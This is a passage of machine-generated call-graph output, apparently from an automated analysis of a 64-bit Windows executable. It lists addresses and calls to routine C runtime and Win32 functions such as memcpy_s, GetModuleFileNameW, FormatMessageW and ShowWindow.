17974->17978 17977 7ff78c9b894c __std_exception_copy 17975->17977 17975->17978 17976 7ff78c9b8953 MultiByteToWideChar 17976->17977 17977->17643 17978->17976 17978->17977 17980 7ff78c9b278e memcpy_s 17979->17980 17984 7ff78c9b1c60 49 API calls 17980->17984 17985 7ff78c9b29a2 17980->17985 17990 7ff78c9b2989 17980->17990 17991 7ff78c9b2140 81 API calls 17980->17991 17993 7ff78c9b2987 17980->17993 17996 7ff78c9b2990 17980->17996 19067 7ff78c9b3980 17980->19067 19073 7ff78c9b7270 17980->19073 19084 7ff78c9b15e0 17980->19084 19132 7ff78c9b6570 17980->19132 19136 7ff78c9b35b0 17980->19136 19180 7ff78c9b3870 17980->19180 17984->17980 17987 7ff78c9b1e50 81 API calls 17985->17987 17987->17993 17992 7ff78c9b1e50 81 API calls 17990->17992 17991->17980 17992->17993 18000 7ff78c9b1c85 17999->18000 18001 7ff78c9c5864 49 API calls 18000->18001 18002 7ff78c9b1ca8 18001->18002 18002->17573 18004 7ff78c9b88f0 2 API calls 18003->18004 18005 7ff78c9b7e04 18004->18005 18006 7ff78c9c9114 38 API calls 18005->18006 18007 7ff78c9b7e16 __std_exception_copy 18006->18007 18007->17585 18009 7ff78c9b39ec 18008->18009 18010 7ff78c9b88f0 2 API calls 18009->18010 18011 7ff78c9b3a14 18010->18011 18012 7ff78c9b88f0 2 API calls 18011->18012 18013 7ff78c9b3a27 18012->18013 19353 7ff78c9c6ef4 18013->19353 18016 7ff78c9bbab0 _log10_special 8 API calls 18017 7ff78c9b2ceb 18016->18017 18017->17574 18018 7ff78c9b73e0 18017->18018 18019 7ff78c9b7404 18018->18019 18020 7ff78c9bfbcc 73 API calls 18019->18020 18025 7ff78c9b74db __std_exception_copy 18019->18025 18021 7ff78c9b7420 18020->18021 18021->18025 19744 7ff78c9c87a4 18021->19744 18023 7ff78c9bfbcc 73 API calls 18026 7ff78c9b7435 18023->18026 18024 7ff78c9bf894 _fread_nolock 53 API calls 18024->18026 18025->17579 18026->18023 18026->18024 18026->18025 18028 7ff78c9bf574 18027->18028 19759 7ff78c9bf320 18028->19759 18030 7ff78c9bf58d 18030->17574 18032 7ff78c9bbdb0 18031->18032 18033 7ff78c9b1e74 GetCurrentProcessId 18032->18033 18034 7ff78c9b1c60 49 API calls 18033->18034 18035 7ff78c9b1ec5 18034->18035 18036 7ff78c9c5864 49 API calls 18035->18036 18037 7ff78c9b1f02 18036->18037 18038 7ff78c9b1cc0 80 API calls 18037->18038 18039 7ff78c9b1f0c 18038->18039 18040 7ff78c9bbab0 _log10_special 8 API calls 18039->18040 18041 7ff78c9b1f1c 18040->18041 18041->17700 18043 7ff78c9b88f0 2 API calls 18042->18043 18044 7ff78c9b7dac 18043->18044 18045 7ff78c9b88f0 2 API calls 18044->18045 18046 7ff78c9b7dbc 18045->18046 18047 7ff78c9c9114 38 API calls 18046->18047 18048 7ff78c9b7dca __std_exception_copy 18047->18048 18048->17589 18050 7ff78c9b8544 GetCurrentProcessId GetWindowThreadProcessId 18049->18050 18051 7ff78c9b3038 18049->18051 18050->18051 18052 7ff78c9b8563 18050->18052 18051->17610 18052->18051 18053 7ff78c9b8569 ShowWindow 18052->18053 18053->18051 18055 7ff78c9b86b4 GetCurrentProcessId GetWindowThreadProcessId 18054->18055 18056 7ff78c9b86e7 18054->18056 18055->18056 18057 7ff78c9b86d3 18055->18057 18056->17610 18057->18056 18058 7ff78c9b86d9 ShowWindow 18057->18058 18058->18056 18060 7ff78c9b1c60 49 API calls 18059->18060 18061 7ff78c9b391d 18060->18061 18061->17624 18063 7ff78c9b1c60 49 API calls 18062->18063 18064 7ff78c9b3a80 18063->18064 18064->17640 18159 7ff78c9c627c EnterCriticalSection 18152->18159 18161 7ff78c9b2a7c GetModuleFileNameW 18160->18161 18161->17842 18161->17843 18163 7ff78c9b8832 18162->18163 18164 7ff78c9b881f FindClose 18162->18164 18165 7ff78c9bbab0 _log10_special 8 API calls 18163->18165 18164->18163 18166 7ff78c9b2ada 18165->18166 18166->17848 18166->17849 18168 7ff78c9bbdb0 18167->18168 18169 7ff78c9b2330 GetCurrentProcessId 18168->18169 18202 7ff78c9b1d50 18169->18202 18171 7ff78c9b237b 18206 7ff78c9c5ab8 18171->18206 18174 7ff78c9b1d50 48 API calls 18175 7ff78c9b23eb FormatMessageW 18174->18175 18177 7ff78c9b2436 18175->18177 18178 7ff78c9b2424 18175->18178 18224 7ff78c9b1e00 18177->18224 18179 7ff78c9b1d50 48 API calls 18178->18179 18179->18177 18182 7ff78c9bbab0 _log10_special 8 API calls 18183 7ff78c9b2464 18182->18183 18183->17847 18185 7ff78c9b88a0 GetFinalPathNameByHandleW CloseHandle 18184->18185 18186 7ff78c9b2af0 18184->18186 18185->18186 18186->17856 18186->17857 18188 7ff78c9b1f54 18187->18188 18189 7ff78c9b1d50 48 API calls 18188->18189 18190 7ff78c9b1fa5 18189->18190 18191 7ff78c9c5ab8 48 API calls 18190->18191 18192 7ff78c9b1fe3 18191->18192 18193 7ff78c9b1e00 78 API calls 18192->18193 18194 7ff78c9b2001 18193->18194 18195 7ff78c9bbab0 _log10_special 8 API calls 18194->18195 18196 7ff78c9b2011 18195->18196 18196->17847 18198 7ff78c9b89ca WideCharToMultiByte 18197->18198 18200 7ff78c9b89f5 18197->18200 18198->18200 18201 7ff78c9b8a0b __std_exception_copy 18198->18201 18199 7ff78c9b8a12 WideCharToMultiByte 18199->18201 18200->18199 18200->18201 18201->17855 18203 7ff78c9b1d75 18202->18203 18204 7ff78c9c5ab8 48 API calls 18203->18204 18205 7ff78c9b1d98 18204->18205 18205->18171 18207 7ff78c9c5b12 18206->18207 18208 7ff78c9c5b37 18207->18208 18209 7ff78c9c5b73 18207->18209 18210 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18208->18210 18228 7ff78c9c2da8 18209->18228 18212 7ff78c9c5b61 18210->18212 18214 7ff78c9bbab0 _log10_special 8 API calls 18212->18214 18213 7ff78c9c5c54 18215 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18213->18215 18217 7ff78c9b23bb 18214->18217 18215->18212 18217->18174 18218 7ff78c9c5c7a 18218->18213 18220 7ff78c9c5c84 18218->18220 18219 7ff78c9c5c29 18221 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18219->18221 18223 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18220->18223 18221->18212 18222 7ff78c9c5c20 18222->18213 18222->18219 18223->18212 18225 7ff78c9b1e26 18224->18225 18558 7ff78c9c5740 18225->18558 18227 7ff78c9b1e3c 18227->18182 18229 7ff78c9c2de6 18228->18229 18230 7ff78c9c2dd6 18228->18230 18231 7ff78c9c2def 18229->18231 18236 7ff78c9c2e1d 18229->18236 18234 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18230->18234 18232 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18231->18232 18233 7ff78c9c2e15 18232->18233 18233->18213 18233->18218 18233->18219 18233->18222 18234->18233 18236->18230 18236->18233 18239 7ff78c9c43f0 18236->18239 18272 7ff78c9c3540 18236->18272 18309 7ff78c9c2330 18236->18309 18240 7ff78c9c4432 18239->18240 18241 7ff78c9c44a3 18239->18241 18244 7ff78c9c4438 18240->18244 18245 7ff78c9c44cd 18240->18245 18242 7ff78c9c44a8 18241->18242 18243 7ff78c9c44fc 18241->18243 18246 7ff78c9c44aa 18242->18246 18247 7ff78c9c44dd 18242->18247 18251 7ff78c9c4506 18243->18251 18252 7ff78c9c4513 18243->18252 18257 7ff78c9c450b 18243->18257 18248 7ff78c9c443d 18244->18248 18249 7ff78c9c446c 18244->18249 18332 7ff78c9c12cc 18245->18332 18250 7ff78c9c444c 18246->18250 18259 7ff78c9c44b9 18246->18259 18339 7ff78c9c0ebc 18247->18339 18248->18252 18254 7ff78c9c4443 18248->18254 18249->18254 18249->18257 18270 7ff78c9c453c 18250->18270 18312 7ff78c9c4ba4 18250->18312 18251->18245 18251->18257 18346 7ff78c9c50f8 18252->18346 18254->18250 18260 7ff78c9c447e 18254->18260 18267 7ff78c9c4467 18254->18267 18257->18270 18350 7ff78c9c16dc 18257->18350 18259->18245 18262 7ff78c9c44be 18259->18262 18260->18270 18322 7ff78c9c4ee0 18260->18322 18262->18270 18328 7ff78c9c4fa4 18262->18328 18264 7ff78c9bbab0 _log10_special 8 API calls 18266 7ff78c9c4836 18264->18266 18266->18236 18267->18270 18271 7ff78c9c4728 18267->18271 18357 7ff78c9c5210 18267->18357 18270->18264 18271->18270 18363 7ff78c9cfa70 18271->18363 18273 7ff78c9c3564 18272->18273 18274 7ff78c9c354e 18272->18274 18275 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18273->18275 18276 7ff78c9c35a4 18273->18276 18274->18276 18277 7ff78c9c4432 18274->18277 18278 7ff78c9c44a3 18274->18278 18275->18276 18276->18236 18281 7ff78c9c4438 18277->18281 18282 7ff78c9c44cd 18277->18282 18279 7ff78c9c44a8 18278->18279 18280 7ff78c9c44fc 18278->18280 18283 7ff78c9c44aa 18279->18283 18284 7ff78c9c44dd 18279->18284 18288 7ff78c9c4506 18280->18288 18289 7ff78c9c4513 18280->18289 18294 7ff78c9c450b 18280->18294 18285 7ff78c9c443d 18281->18285 18286 7ff78c9c446c 18281->18286 18290 7ff78c9c12cc 38 API calls 18282->18290 18287 7ff78c9c444c 18283->18287 18296 7ff78c9c44b9 18283->18296 18292 7ff78c9c0ebc 38 API calls 18284->18292 18285->18289 18291 7ff78c9c4443 18285->18291 18286->18291 18286->18294 18293 7ff78c9c4ba4 47 API calls 18287->18293 18306 7ff78c9c453c 18287->18306 18288->18282 18288->18294 18295 7ff78c9c50f8 45 API calls 18289->18295 18304 7ff78c9c4467 18290->18304 18291->18287 18297 7ff78c9c447e 18291->18297 18291->18304 18292->18304 18293->18304 18298 7ff78c9c16dc 38 API calls 18294->18298 18294->18306 18295->18304 18296->18282 18299 7ff78c9c44be 18296->18299 18300 7ff78c9c4ee0 46 API calls 18297->18300 18297->18306 18298->18304 18302 7ff78c9c4fa4 37 API calls 18299->18302 18299->18306 18300->18304 18301 7ff78c9bbab0 _log10_special 8 API calls 18303 7ff78c9c4836 18301->18303 18302->18304 18303->18236 18305 7ff78c9c4728 18304->18305 18304->18306 18307 7ff78c9c5210 45 API calls 18304->18307 18305->18306 18308 7ff78c9cfa70 46 API calls 18305->18308 18306->18301 18307->18305 18308->18305 18541 7ff78c9c0540 18309->18541 18313 7ff78c9c4bca 18312->18313 18375 7ff78c9c00f8 18313->18375 18318 7ff78c9c5210 45 API calls 18320 7ff78c9c4d0f 18318->18320 18319 7ff78c9c5210 45 API calls 18321 7ff78c9c4d9d 18319->18321 18320->18319 18320->18320 18320->18321 18321->18267 18324 7ff78c9c4f15 18322->18324 18323 7ff78c9c4f33 18326 7ff78c9cfa70 46 API calls 18323->18326 18324->18323 18325 7ff78c9c5210 45 API calls 18324->18325 18327 7ff78c9c4f5a 18324->18327 18325->18323 18326->18327 18327->18267 18331 7ff78c9c4fc5 18328->18331 18329 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18330 7ff78c9c4ff6 18329->18330 18330->18267 18331->18329 18331->18330 18333 7ff78c9c12ff 18332->18333 18334 7ff78c9c132e 18333->18334 18336 7ff78c9c13eb 18333->18336 18338 7ff78c9c136b 18334->18338 18511 7ff78c9c01a0 18334->18511 18337 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18336->18337 18337->18338 18338->18267 18340 7ff78c9c0eef 18339->18340 18341 7ff78c9c0f1e 18340->18341 18343 7ff78c9c0fdb 18340->18343 18342 7ff78c9c01a0 12 API calls 18341->18342 18344 7ff78c9c0f5b 18341->18344 18342->18344 18345 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18343->18345 18344->18267 18345->18344 18347 7ff78c9c513b 18346->18347 18349 7ff78c9c513f __crtLCMapStringW 18347->18349 18519 7ff78c9c5194 18347->18519 18349->18267 18351 7ff78c9c170f 18350->18351 18352 7ff78c9c173e 18351->18352 18354 7ff78c9c17fb 18351->18354 18353 7ff78c9c01a0 12 API calls 18352->18353 18356 7ff78c9c177b 18352->18356 18353->18356 18355 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18354->18355 18355->18356 18356->18267 18358 7ff78c9c5227 18357->18358 18523 7ff78c9cea20 18358->18523 18365 7ff78c9cfaa1 18363->18365 18372 7ff78c9cfaaf 18363->18372 18364 7ff78c9cfacf 18367 7ff78c9cfae0 18364->18367 18368 7ff78c9cfb07 18364->18368 18365->18364 18366 7ff78c9c5210 45 API calls 18365->18366 18365->18372 18366->18364 18531 7ff78c9d12b0 18367->18531 18370 7ff78c9cfb31 18368->18370 18371 7ff78c9cfb92 18368->18371 18368->18372 18370->18372 18534 7ff78c9d0ab0 18370->18534 18373 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 18371->18373 18372->18271 18373->18372 18376 7ff78c9c012f 18375->18376 18377 7ff78c9c011e 18375->18377 18376->18377 18378 7ff78c9ce664 _fread_nolock 12 API calls 18376->18378 18383 7ff78c9cf5d8 18377->18383 18379 7ff78c9c015c 18378->18379 18380 7ff78c9c0170 18379->18380 18381 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18379->18381 18382 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18380->18382 18381->18380 18382->18377 18384 7ff78c9cf5f5 18383->18384 18385 7ff78c9cf628 18383->18385 18386 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18384->18386 18385->18384 18388 7ff78c9cf65a 18385->18388 18396 7ff78c9c4ced 18386->18396 18387 7ff78c9cf76d 18389 7ff78c9cf85f 18387->18389 18391 7ff78c9cf825 18387->18391 18393 7ff78c9cf7f4 18387->18393 18395 7ff78c9cf7b7 18387->18395 18398 7ff78c9cf7ad 18387->18398 18388->18387 18400 7ff78c9cf6a2 18388->18400 18438 7ff78c9ceac4 18389->18438 18431 7ff78c9cee5c 18391->18431 18424 7ff78c9cf13c 18393->18424 18414 7ff78c9cf36c 18395->18414 18396->18318 18396->18320 18398->18391 18399 7ff78c9cf7b2 18398->18399 18399->18393 18399->18395 18400->18396 18405 7ff78c9cb34c 18400->18405 18403 7ff78c9cb7e4 _isindst 17 API calls 18404 7ff78c9cf8bc 18403->18404 18406 7ff78c9cb363 18405->18406 18407 7ff78c9cb359 18405->18407 18408 7ff78c9c5de8 _set_fmode 11 API calls 18406->18408 18407->18406 18412 7ff78c9cb37e 18407->18412 18409 7ff78c9cb36a 18408->18409 18411 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18409->18411 18410 7ff78c9cb376 18410->18396 18410->18403 18411->18410 18412->18410 18413 7ff78c9c5de8 _set_fmode 11 API calls 18412->18413 18413->18409 18447 7ff78c9d52bc 18414->18447 18418 7ff78c9cf414 18419 7ff78c9cf418 18418->18419 18420 7ff78c9cf469 18418->18420 18422 7ff78c9cf434 18418->18422 18419->18396 18500 7ff78c9cef58 18420->18500 18496 7ff78c9cf214 18422->18496 18425 7ff78c9d52bc 38 API calls 18424->18425 18426 7ff78c9cf186 18425->18426 18427 7ff78c9d4d04 37 API calls 18426->18427 18428 7ff78c9cf1d6 18427->18428 18429 7ff78c9cf1da 18428->18429 18430 7ff78c9cf214 45 API calls 18428->18430 18429->18396 18430->18429 18432 7ff78c9d52bc 38 API calls 18431->18432 18433 7ff78c9ceea7 18432->18433 18434 7ff78c9d4d04 37 API calls 18433->18434 18435 7ff78c9ceeff 18434->18435 18436 7ff78c9cef03 18435->18436 18437 7ff78c9cef58 45 API calls 18435->18437 18436->18396 18437->18436 18439 7ff78c9ceb3c 18438->18439 18440 7ff78c9ceb09 18438->18440 18442 7ff78c9ceb54 18439->18442 18443 7ff78c9cebd5 18439->18443 18441 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18440->18441 18446 7ff78c9ceb35 memcpy_s 18441->18446 18444 7ff78c9cee5c 46 API calls 18442->18444 18445 7ff78c9c5210 45 API calls 18443->18445 18443->18446 18444->18446 18445->18446 18446->18396 18448 7ff78c9d530f fegetenv 18447->18448 18449 7ff78c9d903c 37 API calls 18448->18449 18452 7ff78c9d5362 18449->18452 18450 7ff78c9d5452 18453 7ff78c9d903c 37 API calls 18450->18453 18451 7ff78c9d538f 18455 7ff78c9cb34c __std_exception_copy 37 API calls 18451->18455 18452->18450 18456 7ff78c9d542c 18452->18456 18457 7ff78c9d537d 18452->18457 18454 7ff78c9d547c 18453->18454 18458 7ff78c9d903c 37 API calls 18454->18458 18459 7ff78c9d540d 18455->18459 18461 7ff78c9cb34c __std_exception_copy 37 API calls 18456->18461 18457->18450 18457->18451 18462 7ff78c9d548d 18458->18462 18460 7ff78c9d6534 18459->18460 18467 7ff78c9d5415 18459->18467 18463 7ff78c9cb7e4 _isindst 17 API calls 18460->18463 18461->18459 18464 7ff78c9d9230 20 API calls 18462->18464 18465 7ff78c9d6549 18463->18465 18473 7ff78c9d54f6 memcpy_s 18464->18473 18466 7ff78c9bbab0 _log10_special 8 API calls 18468 7ff78c9cf3b9 18466->18468 18467->18466 18492 7ff78c9d4d04 18468->18492 18469 7ff78c9d589f memcpy_s 18470 7ff78c9d5537 memcpy_s 18484 7ff78c9d5993 memcpy_s 18470->18484 18491 7ff78c9d5e7b memcpy_s 18470->18491 18471 7ff78c9d5b8b 18471->18471 18474 7ff78c9d5bdf 18471->18474 18475 7ff78c9d654c memcpy_s 37 API calls 18471->18475 18472 7ff78c9d4e20 37 API calls 18478 7ff78c9d62f7 18472->18478 18473->18469 18473->18470 18476 7ff78c9c5de8 _set_fmode 11 API calls 18473->18476 18474->18472 18475->18474 18477 7ff78c9d5970 18476->18477 18479 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18477->18479 18480 7ff78c9d654c memcpy_s 37 API calls 18478->18480 18490 7ff78c9d6352 18478->18490 18479->18470 18480->18490 18481 7ff78c9d64d8 18482 7ff78c9d903c 37 API calls 18481->18482 18482->18467 18483 7ff78c9c5de8 11 API calls _set_fmode 18483->18484 18484->18471 18484->18483 18488 7ff78c9cb7c4 37 API calls _invalid_parameter_noinfo 18484->18488 18485 7ff78c9c5de8 11 API calls _set_fmode 18485->18491 18486 7ff78c9d4e20 37 API calls 18486->18490 18487 7ff78c9cb7c4 37 API calls _invalid_parameter_noinfo 18487->18491 18488->18484 18489 7ff78c9d654c memcpy_s 37 API calls 18489->18490 18490->18481 18490->18486 18490->18489 18491->18471 18491->18474 18491->18485 18491->18487 18493 7ff78c9d4d23 18492->18493 18494 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18493->18494 18495 7ff78c9d4d4e memcpy_s 18493->18495 18494->18495 18495->18418 18497 7ff78c9cf240 memcpy_s 18496->18497 18498 7ff78c9c5210 45 API calls 18497->18498 18499 7ff78c9cf2fa memcpy_s 18497->18499 18498->18499 18499->18419 18501 7ff78c9cef93 18500->18501 18505 7ff78c9cefe0 memcpy_s 18500->18505 18502 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18501->18502 18503 7ff78c9cefbf 18502->18503 18503->18419 18504 7ff78c9cf04b 18506 7ff78c9cb34c __std_exception_copy 37 API calls 18504->18506 18505->18504 18507 7ff78c9c5210 45 API calls 18505->18507 18510 7ff78c9cf08d memcpy_s 18506->18510 18507->18504 18508 7ff78c9cb7e4 _isindst 17 API calls 18509 7ff78c9cf138 18508->18509 18510->18508 18512 7ff78c9c01d7 18511->18512 18518 7ff78c9c01c6 18511->18518 18513 7ff78c9ce664 _fread_nolock 12 API calls 18512->18513 18512->18518 18514 7ff78c9c0208 18513->18514 18515 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18514->18515 18517 7ff78c9c021c 18514->18517 18515->18517 18516 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18516->18518 18517->18516 18518->18338 18520 7ff78c9c51b2 18519->18520 18521 7ff78c9c51ba 18519->18521 18522 7ff78c9c5210 45 API calls 18520->18522 18521->18349 18522->18521 18524 7ff78c9c524f 18523->18524 18525 7ff78c9cea39 18523->18525 18527 7ff78c9cea8c 18524->18527 18525->18524 18526 7ff78c9d4514 45 API calls 18525->18526 18526->18524 18528 7ff78c9ceaa5 18527->18528 18529 7ff78c9c525f 18527->18529 18528->18529 18530 7ff78c9d3860 45 API calls 18528->18530 18529->18271 18530->18529 18537 7ff78c9d7f98 18531->18537 18536 7ff78c9d0ab9 MultiByteToWideChar 18534->18536 18540 7ff78c9d7ffc 18537->18540 18538 7ff78c9bbab0 _log10_special 8 API calls 18539 7ff78c9d12cd 18538->18539 18539->18372 18540->18538 18542 7ff78c9c0575 18541->18542 18543 7ff78c9c0587 18541->18543 18544 7ff78c9c5de8 _set_fmode 11 API calls 18542->18544 18545 7ff78c9c0595 18543->18545 18549 7ff78c9c05d1 18543->18549 18546 7ff78c9c057a 18544->18546 18547 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18545->18547 18548 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18546->18548 18557 7ff78c9c0585 18547->18557 18548->18557 18550 7ff78c9c094d 18549->18550 18552 7ff78c9c5de8 _set_fmode 11 API calls 18549->18552 18551 7ff78c9c5de8 _set_fmode 11 API calls 18550->18551 18550->18557 18554 7ff78c9c0be1 18551->18554 18553 7ff78c9c0942 18552->18553 18555 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18553->18555 18556 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18554->18556 18555->18550 18556->18557 18557->18236 18559 7ff78c9c576a 18558->18559 18560 7ff78c9c57a2 18559->18560 18562 7ff78c9c57d5 18559->18562 18561 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18560->18561 18564 7ff78c9c57cb 18561->18564 18565 7ff78c9c0078 18562->18565 18564->18227 18572 7ff78c9c627c EnterCriticalSection 18565->18572 18574 7ff78c9bfbfc 18573->18574 18601 7ff78c9bf95c 18574->18601 18576 7ff78c9bfc15 18576->17871 18613 7ff78c9bf8b4 18577->18613 18581 7ff78c9bbdb0 18580->18581 18582 7ff78c9b2040 GetCurrentProcessId 18581->18582 18583 7ff78c9b1c60 49 API calls 18582->18583 18584 7ff78c9b208b 18583->18584 18627 7ff78c9c5864 18584->18627 18588 7ff78c9b20ec 18589 7ff78c9b1c60 49 API calls 18588->18589 18590 7ff78c9b2106 18589->18590 18667 7ff78c9b1cc0 18590->18667 18593 7ff78c9bbab0 _log10_special 8 API calls 18594 7ff78c9b2120 18593->18594 18594->17910 18596 7ff78c9bf611 18595->18596 18597 7ff78c9b1b69 18595->18597 18598 7ff78c9c5de8 _set_fmode 11 API calls 18596->18598 18597->17909 18597->17910 18599 7ff78c9bf616 18598->18599 18600 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18599->18600 18600->18597 18602 7ff78c9bf9c6 18601->18602 18603 7ff78c9bf986 18601->18603 18602->18603 18605 7ff78c9bf9d2 18602->18605 18604 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18603->18604 18611 7ff78c9bf9ad 18604->18611 18612 7ff78c9c627c EnterCriticalSection 18605->18612 18611->18576 18614 7ff78c9bf8de 18613->18614 18615 7ff78c9b1a00 18613->18615 18614->18615 18616 7ff78c9bf92a 18614->18616 18617 7ff78c9bf8ed memcpy_s 18614->18617 18615->17879 18615->17880 18626 7ff78c9c627c EnterCriticalSection 18616->18626 18620 7ff78c9c5de8 _set_fmode 11 API calls 18617->18620 18622 7ff78c9bf902 18620->18622 18624 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18622->18624 18624->18615 18631 7ff78c9c58be 18627->18631 18628 7ff78c9c58e3 18629 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18628->18629 18633 7ff78c9c590d 18629->18633 18630 7ff78c9c591f 18678 7ff78c9c2758 18630->18678 18631->18628 18631->18630 18635 7ff78c9bbab0 _log10_special 8 API calls 18633->18635 18634 7ff78c9c59fc 18636 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18634->18636 18638 7ff78c9b20ca 18635->18638 18636->18633 18645 7ff78c9c6040 18638->18645 18639 7ff78c9c59d1 18642 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18639->18642 18640 7ff78c9c5a20 18640->18634 18641 7ff78c9c5a2a 18640->18641 18644 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18641->18644 18642->18633 18643 7ff78c9c59c8 18643->18634 18643->18639 18644->18633 18646 7ff78c9cc168 _set_fmode 11 API calls 18645->18646 18647 7ff78c9c6057 18646->18647 18648 7ff78c9c605f 18647->18648 18649 7ff78c9cfda4 _set_fmode 11 API calls 18647->18649 18652 7ff78c9c6097 18647->18652 18648->18588 18650 7ff78c9c608c 18649->18650 18651 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18650->18651 18651->18652 18652->18648 18816 7ff78c9cfe2c 18652->18816 18655 7ff78c9cb7e4 _isindst 17 API calls 18656 7ff78c9c60dc 18655->18656 18657 7ff78c9cfda4 _set_fmode 11 API calls 18656->18657 18658 7ff78c9c6129 18657->18658 18659 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18658->18659 18660 7ff78c9c6137 18659->18660 18661 7ff78c9cfda4 _set_fmode 11 API calls 18660->18661 18665 7ff78c9c6161 18660->18665 18662 7ff78c9c6153 18661->18662 18664 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18662->18664 18664->18665 18666 7ff78c9c616a 18665->18666 18825 7ff78c9d0280 18665->18825 18666->18588 18668 7ff78c9b1ccc 18667->18668 18669 7ff78c9b88f0 2 API calls 18668->18669 18670 7ff78c9b1cf4 18669->18670 18671 7ff78c9b1d19 18670->18671 18672 7ff78c9b1cfe 18670->18672 18840 7ff78c9b1db0 18671->18840 18674 7ff78c9b1e00 78 API calls 18672->18674 18675 7ff78c9b1d17 18674->18675 18676 7ff78c9bbab0 _log10_special 8 API calls 18675->18676 18677 7ff78c9b1d40 18676->18677 18677->18593 18679 7ff78c9c2796 18678->18679 18680 7ff78c9c2786 18678->18680 18681 7ff78c9c279f 18679->18681 18686 7ff78c9c27cd 18679->18686 18682 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18680->18682 18683 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18681->18683 18684 7ff78c9c27c5 18682->18684 18683->18684 18684->18634 18684->18639 18684->18640 18684->18643 18685 7ff78c9c5210 45 API calls 18685->18686 18686->18680 18686->18684 18686->18685 18688 7ff78c9c2a7c 18686->18688 18692 7ff78c9c3b28 18686->18692 18718 7ff78c9c3208 18686->18718 18748 7ff78c9c22a0 18686->18748 18690 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18688->18690 18690->18680 18693 7ff78c9c3b6a 18692->18693 18694 7ff78c9c3bdd 18692->18694 18695 7ff78c9c3b70 18693->18695 18696 7ff78c9c3c07 18693->18696 18697 7ff78c9c3be2 18694->18697 18698 7ff78c9c3c37 18694->18698 18705 7ff78c9c3b75 18695->18705 18709 7ff78c9c3c46 18695->18709 18765 7ff78c9c10c8 18696->18765 18699 7ff78c9c3be4 18697->18699 18700 7ff78c9c3c17 18697->18700 18698->18696 18698->18709 18716 7ff78c9c3ba0 18698->18716 18702 7ff78c9c3b85 18699->18702 18708 7ff78c9c3bf3 18699->18708 18772 7ff78c9c0cb8 18700->18772 18717 7ff78c9c3c75 18702->18717 18751 7ff78c9c4950 18702->18751 18705->18702 18706 7ff78c9c3bb8 18705->18706 18705->18716 18706->18717 18761 7ff78c9c4e0c 18706->18761 18708->18696 18711 7ff78c9c3bf8 18708->18711 18709->18717 18779 7ff78c9c14d8 18709->18779 18714 7ff78c9c4fa4 37 API calls 18711->18714 18711->18717 18712 7ff78c9bbab0 _log10_special 8 API calls 18713 7ff78c9c3f0b 18712->18713 18713->18686 18714->18716 18716->18717 18786 7ff78c9cf8c0 18716->18786 18717->18712 18719 7ff78c9c3213 18718->18719 18720 7ff78c9c3229 18718->18720 18721 7ff78c9c3b6a 18719->18721 18722 7ff78c9c3bdd 18719->18722 18731 7ff78c9c3267 18719->18731 18723 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18720->18723 18720->18731 18724 7ff78c9c3b70 18721->18724 18725 7ff78c9c3c07 18721->18725 18726 7ff78c9c3be2 18722->18726 18729 7ff78c9c3c37 18722->18729 18723->18731 18733 7ff78c9c3b75 18724->18733 18736 7ff78c9c3c46 18724->18736 18730 7ff78c9c10c8 38 API calls 18725->18730 18727 7ff78c9c3be4 18726->18727 18728 7ff78c9c3c17 18726->18728 18732 7ff78c9c3b85 18727->18732 18739 7ff78c9c3bf3 18727->18739 18734 7ff78c9c0cb8 38 API calls 18728->18734 18729->18725 18729->18736 18746 7ff78c9c3ba0 18729->18746 18730->18746 18731->18686 18735 7ff78c9c4950 47 API calls 18732->18735 18747 7ff78c9c3c75 18732->18747 18733->18732 18737 7ff78c9c3bb8 18733->18737 18733->18746 18734->18746 18735->18746 18738 7ff78c9c14d8 38 API calls 18736->18738 18736->18747 18740 7ff78c9c4e0c 47 API calls 18737->18740 18737->18747 18738->18746 18739->18725 18741 7ff78c9c3bf8 18739->18741 18740->18746 18743 7ff78c9c4fa4 37 API calls 18741->18743 18741->18747 18742 7ff78c9bbab0 _log10_special 8 API calls 18744 7ff78c9c3f0b 18742->18744 18743->18746 18744->18686 18745 7ff78c9cf8c0 47 API 